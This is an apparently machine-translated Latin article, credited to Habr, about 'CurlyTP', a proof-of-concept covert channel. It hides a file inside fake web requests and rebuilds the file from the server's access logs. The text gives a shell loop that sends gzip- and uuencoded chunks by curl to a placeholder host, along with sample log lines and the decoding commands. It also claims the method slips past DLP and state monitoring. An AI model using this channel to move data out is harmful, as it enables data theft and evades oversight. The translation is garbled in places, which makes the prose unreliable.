Secundum definitionem Vicipaediae, gutta mortua est instrumentum coniurationis, quod notitias vel aliquas res inter homines utentes loco secreto inservit. Idea est quod homines numquam conveniant - sed adhuc informationes permutant ad salutem perficiendam conservandam.
Abditum locum non debet conspici. Itaque in offline saepe rebus discretis utuntur: laxo latere in pariete, librario, vel concavo in arbore.
Multa instrumenta encryptionis et anonymizationis in Interreti sunt, sed hoc ipsum utendi his instrumentis animum allicit. Praeterea in ordine corporatum vel regimen gubernationis impediri possunt. Quid facere?
Developer Ryan Flores an interesting optionem proposuit - . Si cogitas, quid facit server tela? Petitiones accipit, lima exit et acta scribit. Et taleas omnes petitiones; etiam falsa sunt!
Evenit ut cuilibet servo permittat te paene nuntium in iniuria servare. Flores mirati sunt quomodo hoc uterentur.
Hanc optionem offert;
- Sume tabellam textam (nuntium secretum) et computa Nullam (md5sum).
- Encodemus illud (gzip+uuencode).
- Scribimus stipes utendo de industria falsa petitionem servo.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shAd fasciculum legere, has operationes ordine transverso exsequi debes: decode et fasciculum unzip, Nullam reprehendo (Nulla per canales apertos tuto traduci potest).
Spatia reponuntur =+=ut nulla sint spatia in inscriptione. Progressio, quam auctor CurlyTP vocat, base64 descriptam utitur, quasi attachiamenta electronica. Petitur cum keyword ?transfer?ut qui facile reperiat in lignis.
Quid in hoc casu cernimus?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"Ut iam dictum est, nuntium secretum recipere debes operationes ordine inverso;
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gProcessus facilis est automate. Md5sum compositus et contenta tabella confirmant omnia recte decocta esse.
Modus est simplex. βPuncti huius exercitationis solum est probare limaculas per innocentes telae petitiones posse transferri, et in quibusvis ministris interretialibus cum textibus simplicibus laborat. Essentialiter, omnis server tela latibulum est! Flores scribit.
Utique, modus tantum operatur si recipiens accessum ad acta servo. Sed talis accessus provisus est, verbi gratia, per multos hospites.
Quomodo uti?
Flores Ryan dicit se expertum securitatis informationem non esse nec elenchum usuum possibilium pro CurlyTP componere. Pro eo, iusta est conceptus argumenti instrumenta familiaria quae videmus cotidie in ligulam adhiberi posse.
Re vera, haec methodus multa commoda in aliis servitoribus "hidis" habet similes aut : non requirit specialem configurationem in ministris partibus vel protocollis specialibus - nec suspicionem movebit apud eos qui negocii monitorem sunt. Veri simile est rationem delata SORM vel DLP scandere ad paginas textuum compressas.
Haec una viae est ad transmittendas nuntios per imaginum officia. Meminisse potes quomodo aliquae societates provectae ponere solebant vel in codice paginarum HTML.
Idea erat solum tincidunt telae hoc ovum paschale visuri, cum persona normalis ad caput capitis vel HTML codicem non spectaret.
Source: www.habr.com